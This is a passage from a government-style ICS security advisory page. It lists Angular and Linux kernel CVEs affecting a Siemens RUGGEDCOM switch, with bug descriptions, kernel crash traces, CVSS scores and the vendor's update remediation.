</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22610</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0, a cross-site scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular’s internal sanitization schema fails to recognize the href and xlink:href attributes of SVG elements as a Resource URL context. This issue has been patched in versions 19.2.18, 20.3.16, 21.0.7, and 21.1.0-rc.0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22610">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22976</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset `qfq_class-&gt;leaf_qdisc-&gt;q.qlen &gt; 0` does not imply that the class itself is active. Two qfq_class objects may point to the same leaf_qdisc. This happens when: 1. one QFQ qdisc is attached to the dev as the root qdisc, and 2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get() / qdisc_put()) and is pending to be destroyed, as in function tc_new_tfilter. When packets are enqueued through the root QFQ qdisc, the shared leaf_qdisc-&gt;q.qlen increases. At the same time, the second QFQ qdisc triggers qdisc_put and qdisc_destroy: the qdisc enters qfq_reset() with its own q-&gt;q.qlen == 0, but its class's leaf qdisc-&gt;q.qlen &gt; 0. Therefore, the qfq_reset would wrongly deactivate an inactive aggregate and trigger a null-deref in qfq_deactivate_agg: [ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 0.903571] #PF: supervisor write access in kernel mode [ 0.903860] #PF: error_code(0x0002) - not-present page [ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0 [ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI [ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE [ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 [ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2)) [ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0 Code starting with the faulting instruction =========================================== 0: 0f 84 4d 01 00 00 je 0x153 6: 48 89 70 18 mov %rsi,0x18(%rax) a: 8b 4b 10 mov 0x10(%rbx),%ecx d: 48 c7 c2 ff ff ff ff mov $0xffffffffffffffff,%rdx 14: 48 8b 78 08 mov 0x8(%rax),%rdi 18: 48 d3 e2 shl %cl,%rdx 1b: 48 21 f2 and %rsi,%rdx 1e: 48 2b 13 sub (%rbx),%rdx 21: 48 8b 30 mov (%rax),%rsi 24: 48 d3 ea shr %cl,%rdx 27: 8b 4b 18 mov 0x18(%rbx),%ecx ... [ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246 [ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000 [ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000 [ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000 [ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880 [ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000 [ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0 [ 0.910247] PKRU: 55555554 [ 0.910391] Call Trace: [ 0.910527] [ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485) [ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036) [ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076) [ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447) [ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958) [ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861) [ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550) [ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) [ 0.912296] ? __alloc_skb (net/core/skbuff.c:706) [ 0.912484] netlink_sendmsg (net/netlink/af ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22976">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22977</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: sock: fix hardened usercopy panic in sock_recv_errqueue skbuff_fclone_cache was created without defining a usercopy region, [1] unlike skbuff_head_cache which properly whitelists the cb[] field. [2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is enabled and the kernel attempts to copy sk_buff.cb data to userspace via sock_recv_errqueue() -&gt; put_cmsg(). The crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone() (from skbuff_fclone_cache) [1] 2. The skb is cloned via skb_clone() using the pre-allocated fclone [3] 3. The cloned skb is queued to sk_error_queue for timestamp reporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE) 5. sock_recv_errqueue() calls put_cmsg() to copy serr-&gt;ee from skb-&gt;cb [4] 6. __check_heap_object() fails because skbuff_fclone_cache has no usercopy whitelist [5] When cloned skbs allocated from skbuff_fclone_cache are used in the socket error queue, accessing the sock_exterr_skb structure in skb-&gt;cb via put_cmsg() triggers a usercopy hardening violation: [ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object 'skbuff_fclone_cache' (offset 296, size 16)! [ 5.382796] kernel BUG at mm/usercopy.c:102! [ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI [ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7 [ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80 [ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff &lt;0f&gt; 0b 490 [ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246 [ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74 [ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0 [ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74 [ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001 [ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00 [ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000 [ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0 [ 5.384903] PKRU: 55555554 [ 5.384903] Call Trace: [ 5.384903] [ 5.384903] __check_heap_object+0x9a/0xd0 [ 5.384903] __check_object_size+0x46c/0x690 [ 5.384903] put_cmsg+0x129/0x5e0 [ 5.384903] sock_recv_errqueue+0x22f/0x380 [ 5.384903] tls_sw_recvmsg+0x7ed/0x1960 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? schedule+0x6d/0x270 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? mutex_unlock+0x81/0xd0 [ 5.384903] ? __pfx_mutex_unlock+0x10/0x10 [ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10 [ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0 [ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 The crash offset 296 corresponds to skb2-&gt;cb within skbuff_fclones: - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 - offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 = 272 + 24 (inside sock_exterr_skb.ee) This patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure. [1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885 [2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104 [3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566 [4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491 [5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-22977">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/489.html">CWE-489 Active Debug Code</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23025</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: prevent pcp corruption with SMP=n The kernel test robot has reported: BUG: spinlock trylock failure on UP on CPU#0, kcompactd0/28 lock: 0xffff888807e35ef0, .magic: dead4ead, .owner: kcompactd0/28, .owner_cpu: 0 CPU: 0 UID: 0 PID: 28 Comm: kcompactd0 Not tainted 6.18.0-rc5-00127-ga06157804399 #1 PREEMPT 8cc09ef94dcec767faa911515ce9e609c45db470 Call Trace: __dump_stack (lib/dump_stack.c:95) dump_stack_lvl (lib/dump_stack.c:123) dump_stack (lib/dump_stack.c:130) spin_dump (kernel/locking/spinlock_debug.c:71) do_raw_spin_trylock (kernel/locking/spinlock_debug.c:?) _raw_spin_trylock (include/linux/spinlock_api_smp.h:89 kernel/locking/spinlock.c:138) __free_frozen_pages (mm/page_alloc.c:2973) ___free_pages (mm/page_alloc.c:5295) __free_pages (mm/page_alloc.c:5334) tlb_remove_table_rcu (include/linux/mm.h:? include/linux/mm.h:3122 include/asm-generic/tlb.h:220 mm/mmu_gather.c:227 mm/mmu_gather.c:290) ? __cfi_tlb_remove_table_rcu (mm/mmu_gather.c:289) ? rcu_core (kernel/rcu/tree.c:?) rcu_core (include/linux/rcupdate.h:341 kernel/rcu/tree.c:2607 kernel/rcu/tree.c:2861) rcu_core_si (kernel/rcu/tree.c:2879) handle_softirqs (arch/x86/include/asm/jump_label.h:36 include/trace/events/irq.h:142 kernel/softirq.c:623) __irq_exit_rcu (arch/x86/include/asm/jump_label.h:36 kernel/softirq.c:725) irq_exit_rcu (kernel/softirq.c:741) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1052) RIP: 0010:_raw_spin_unlock_irqrestore (arch/x86/include/asm/preempt.h:95 include/linux/spinlock_api_smp.h:152 kernel/locking/spinlock.c:194) free_pcppages_bulk (mm/page_alloc.c:1494) drain_pages_zone (include/linux/spinlock.h:391 mm/page_alloc.c:2632) __drain_all_pages (mm/page_alloc.c:2731) drain_all_pages (mm/page_alloc.c:2747) kcompactd (mm/compaction.c:3115) kthread (kernel/kthread.c:465) ? __cfi_kcompactd (mm/compaction.c:3166) ? __cfi_kthread (kernel/kthread.c:412) ret_from_fork (arch/x86/kernel/process.c:164) ? __cfi_kthread (kernel/kthread.c:412) ret_from_fork_asm (arch/x86/entry/entry_64.S:255) Matthew has analyzed the report and identified that in drain_page_zone() we are in a section protected by spin_lock(&amp;pcp-&gt;lock) and then get an interrupt that attempts spin_trylock() on the same lock. The code is designed to work this way without disabling IRQs and occasionally fail the trylock with a fallback. However, the SMP=n spinlock implementation assumes spin_trylock() will always succeed, and thus it's normally a no-op. Here the enabled lock debugging catches the problem, but otherwise it could cause a corruption of the pcp structure. The problem has been introduced by commit 574907741599 ("mm/page_alloc: leave IRQs enabled for per-cpu page allocations"). The pcp locking scheme recognizes the need for disabling IRQs to prevent nesting spin_trylock() sections on SMP=n, but the need to prevent the nesting in spin_lock() has not been recognized. Fix it by introducing local wrappers that change the spin_lock() to spin_lock_iqsave() with SMP=n and use them in all places that do spin_lock(&amp;pcp-&gt;lock). [vbabka@suse.cz: add pcp_ prefix to the spin_lock_irqsave wrappers, per Steven]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23025">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23026</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() Fix a memory leak in gpi_peripheral_config() where the original memory pointed to by gchan-&gt;config could be lost if krealloc() fails. The issue occurs when: 1. gchan-&gt;config points to previously allocated memory 2. krealloc() fails and returns NULL 3. The function directly assigns NULL to gchan-&gt;config, losing the reference to the original memory 4. The original memory becomes unreachable and cannot be freed Fix this by using a temporary variable to hold the krealloc() result and only updating gchan-&gt;config when the allocation succeeds. Found via static analysis and code review.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23026">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23030</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: phy: rockchip: inno-usb2: Fix a double free bug in rockchip_usb2phy_probe() The for_each_available_child_of_node() calls of_node_put() to release child_np in each success loop. After breaking from the loop with the child_np has been released, the code will jump to the put_child label and will call the of_node_put() again if the devm_request_threaded_irq() fails. These cause a double free bug. Fix by returning directly to avoid the duplicate of_node_put().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23030">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23031</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: can: gs_usb: gs_usb_receive_bulk_callback(): fix URB memory leak In gs_can_open(), the URBs for USB-in transfers are allocated, added to the parent-&gt;rx_submitted anchor and submitted. In the complete callback gs_usb_receive_bulk_callback(), the URB is processed and resubmitted. In gs_can_close() the URBs are freed by calling usb_kill_anchored_urbs(parent-&gt;rx_submitted). However, this does not take into account that the USB framework unanchors the URB before the complete function is called. This means that once an in-URB has been completed, it is no longer anchored and is ultimately not released in gs_can_close(). Fix the memory leak by anchoring the URB in the gs_usb_receive_bulk_callback() to the parent-&gt;rx_submitted anchor.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23031">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23032</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: null_blk: fix kmemleak by releasing references to fault configfs items When CONFIG_BLK_DEV_NULL_BLK_FAULT_INJECTION is enabled, the null-blk driver sets up fault injection support by creating the timeout_inject, requeue_inject, and init_hctx_fault_inject configfs items as children of the top-level nullbX configfs group. However, when the nullbX device is removed, the references taken to these fault-config configfs items are not released. As a result, kmemleak reports a memory leak, for example: unreferenced object 0xc00000021ff25c40 (size 32): comm "mkdir", pid 10665, jiffies 4322121578 hex dump (first 32 bytes): 69 6e 69 74 5f 68 63 74 78 5f 66 61 75 6c 74 5f init_hctx_fault_ 69 6e 6a 65 63 74 00 88 00 00 00 00 00 00 00 00 inject.......... backtrace (crc 1a018c86): __kmalloc_node_track_caller_noprof+0x494/0xbd8 kvasprintf+0x74/0xf4 config_item_set_name+0xf0/0x104 config_group_init_type_name+0x48/0xfc fault_config_init+0x48/0xf0 0xc0080000180559e4 configfs_mkdir+0x304/0x814 vfs_mkdir+0x49c/0x604 do_mkdirat+0x314/0x3d0 sys_mkdir+0xa0/0xd8 system_call_exception+0x1b0/0x4f0 system_call_vectored_common+0x15c/0x2ec Fix this by explicitly releasing the references to the fault-config configfs items when dropping the reference to the top-level nullbX configfs group.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23032">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23033</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: omap-dma: fix dma_pool resource leak in error paths The dma_pool created by dma_pool_create() is not destroyed when dma_async_device_register() or of_dma_controller_register() fails, causing a resource leak in the probe error paths. Add dma_pool_destroy() in both error paths to properly release the allocated dma_pool resource.</p>
